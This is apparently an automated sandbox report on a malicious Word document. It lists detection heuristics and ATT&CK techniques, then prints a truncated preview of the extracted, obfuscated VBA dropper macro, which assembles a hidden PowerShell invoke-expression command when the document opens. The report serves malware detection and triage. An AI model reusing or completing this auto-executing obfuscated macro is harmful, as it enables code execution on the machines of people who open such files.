Verdict: MALICIOUS
Risk Score: 222
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a Microsoft Office document containing VBA macros. A 'Document_open' auto-execution macro is present and calls the 'Shell()' function, indicating an attempt to execute arbitrary code as soon as the document is opened. This is further supported by the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic, which fires on the compiled p-code and specifically notes the execution tokens associated with 'Document_open' and 'Shell()'. The ClamAV detection 'Doc.Dropper.Agent-6607753-0' strongly suggests dropper functionality, most likely downloading a second-stage payload.
Heuristics (6)

- ClamAV: Doc.Dropper.Agent-6607753-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6607753-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 46791 bytes |

SHA-256 of macros.bas: 131152e2c5517d249806864f60f421ee8f3007ab8953b175e7f3a4a46c9b485e

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "JUjaivIzL"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
vwLNU = 70077 - 90423 - (18604 / aGkiww)
frIXB = 16085 - 43283 - (71344 / rtUJA)
muqpcw = 85638 - 2228 - (79316 / aZIOs)
LDFfAC = Application.Run("UKkOtTjOB", "" + FwRRrGCHt + SQpMUVR + zzGQYb + aQniRzRQ + ziwLpOAoj + coDukLszGTI + hvooJJ + WJLQcLfCi + CPYULqfW + XTGcbMndHrz + DEfdoiGpR + FWvPh + pGFhaVFq + fwzjfPK + MBLHU + JzhJYVJD + spWzUfiK + lzvimSaVZ + okFQHnSSHChzo + idLGcouOBSWui)
wKmcd = 7557 - 77312 - (42655 / CWJppT)
rhZlhv = 11842 - 7669 - (88503 / Dzlto)
End Sub
Attribute VB_Name = "GXNLFou"
Function zzGQYb()
On Error Resume Next
uzvOSv = (APVwo / QIzZrr + 42680 - 52775 + ssClha / 94509 / 33291 - hrizVn / 381 + vNcEkf - 93496 / Wbock - WINFDM + NiDzcP)
RmLZI = IwcIMF * KzIpI * 92764 * VmQkn + iiZGH + AWFod
nULccd = "" + NKlwqHUCfvIUT + fWbmFMZZVAwE + "pO"
wdEhi = 25125 * zkISvP - JwvSp * ivXcSc * wdjwwt / icTAni / 89156 - OWijc / NLhBk * oDGbOG
KinjG = 15734 * ATtjh - Ddwnza * aSCPWd * lPwuCd / UQVnMS / 42473 - ChGXhW / XNwiBi * cXJdTZ
jvuXh = "" + AKWClmhfvi + VhBtjzjlSCwLAp + "we" + slhJPrNMLj + fjmXduTVFh + "rS" + stDwNKCv + nJzzidTo + "hEl" + ILFmQYi + KQKGaRWoPw + "l " + vOTtcafMpBQ + wjoQipbvZwu + " " + XjMpEph + zltnwDtj + Chr(34) + "& " + KfbkiXh + iWRZQZCwzA + "( $p" + SCljCXuqYBt + SXvwiRWjIqqfMc + "sHO" + EufKasdpAfAnTA + cfwBHCViauK + "mE[4" + EqufuTHOiTZtGv + jNHKODjiM + "]" + Chr(43)
Ywjji = (uwoFH - 47719 + YOwLYH + GXRrj + (BhAJP * FRjRu) + (rbLzJM * oblzEV))
mdwzjTXrc = "" + vAfszfQMvfpoT + wDXjjoHNFPsbP + "$p" + nJNRWimCoLKzEi + VMwCAwZZwnnZd + "Sho" + BizrfbB + KBiUVpD + "Me[3" + bXOTfvpkoTjv + hHJUFmqMTV + "4]" + Chr(43) + zPEDIkEqBjqhz + umiIKzc + "'x'" + LVwwsPDtd + ajkKwrVYzRcUBk + ") ([" + lMfuXOqsnm + ljzEMHbNBYKTcE + "Stri" + jBwLwpRjzsYMqs + jXmRTYHu + "Ng"
YNCMST = (tImqv - 3750 + OQGTiP + IBwjE + (lcLtC * OQEdl) + (FBwkkV * VpDDRn))
KUvGqlk = "" + PLEcNBZR + ntnfJmUtdNbYR + "]::J" + jciZtFqIEBtZJN + fmriuhJtQzu + "oIN(" + jqubhdYqrDnw + iQNLfYlvmZuA + " '' " + oJwKIbUKz + kflniElJwfd + ", " + OJvnEUhjbGBi + oJOTRPjvtzI + "(( " + JrDmLGLwwj + iQvIYkE + "36" + wzkLLnBTPwi + YoYTpcvjpdhOmz + " ,97" + UPDbtMsSaASJ + jCEjrGkEucjv + " ," + DzZoNjuhba + vFspJmDG + "117" + JGHhCQUauwG + daiwwoCad + " ,10" + LiMETurzaYo + fdiMAfFFYpPO + "4,6"
zzGQYb = "" + HSrEffbWYDQHA + wrpIzRS + nULccd + awVanowpoEkjj + nFIFbvti + jvuXh + bwaGhYoJBdhJAj + bSwWZNXj + mdwzjTXrc + INiuhUWbLqViH + XipaiEZWTUahdZ + KUvGqlk
tloQab = (wMnZX - 85968 + sLQZCi + GqnirO + (GmtBzQ * zSPWvc) + (NqfBdi * ORDXjs))
BhjNfq = (tXacIv - 87932 + DHCps + HhNjws + (piNYo * Qimiw) + (nwIaB * jUPAQ))
End Function
Function aQniRzRQ()
On Error Resume Next
vtzVhj = (FEsMEU - 87065 + TQYGmE + zGMGS + (FpOhV * GWiRBP) + (isPOz * nrwjr))
qsusI = (OZzPif - 67252 + mGkzXr + WKjsPB + (jIFXHE * OcpIa) + (fidli * iAlLk))
wwiXhNDAo = "" + ThLztYjtqJGX + XivqwqBojz + "1 " + WiuzUDY + jQpPCQlrTiKj + ", 1" + HQuWshfBNpr + wtpDzKo + "10" + FauZQwNSz + BnhajfmDf + ",101" + YAKmzibLYSluKT + RinvqZlEL + ", 11" + WTYlLJFCu + zirntzPtWGF + "9,45"
aQniRzRQ = "" + UrIJwOGblP + zjakERhDnjFDD + wwiXhNDAo
JSoXKh = 71467 * EGSaQJ + GolvPG - 66081
pRpJRG = 7273 * TBwEf + CNTlv - 88512
End Function
Function ziwLpOAoj()
On Error Resume Next
SNzKwB = 65298 * LbWPzP + mzhEP - 2463
ukVmS = 13690 * WBIXUt + Vfhzql - 10055
VpThl = "" + pakZkQbwBqDYUw + ThMsXjYQhL + ",1" + AdsubCV + IquzaOGMb + "11 ," + tjwTLtX + UrZZXvY + "98 ," + zRbPDKrR + SRDGtpKRhYihfM + " 106" + QQVbiqIDdAbdfl + AaqkQljjMdqaaP + ",1" + tGtawRSbI + sOjlvvohEWl + "01 " + klOBzhcNNMk + CziIObQJnVfrv + ", " + hisHaOqLCQcb + iBwNCtrzv + "99,1" + PVwPiJEC + fTdwdLljrmA + "16 " + ITjismvimkzKtu + HYYhjzhTOZ + ", 3" + SDVJXbn + iLQuwtifnkRpMj + "2, 7" + LKJlQQTEpQj + nRGAUdMImmFwn + "8 ,1"
... (truncated)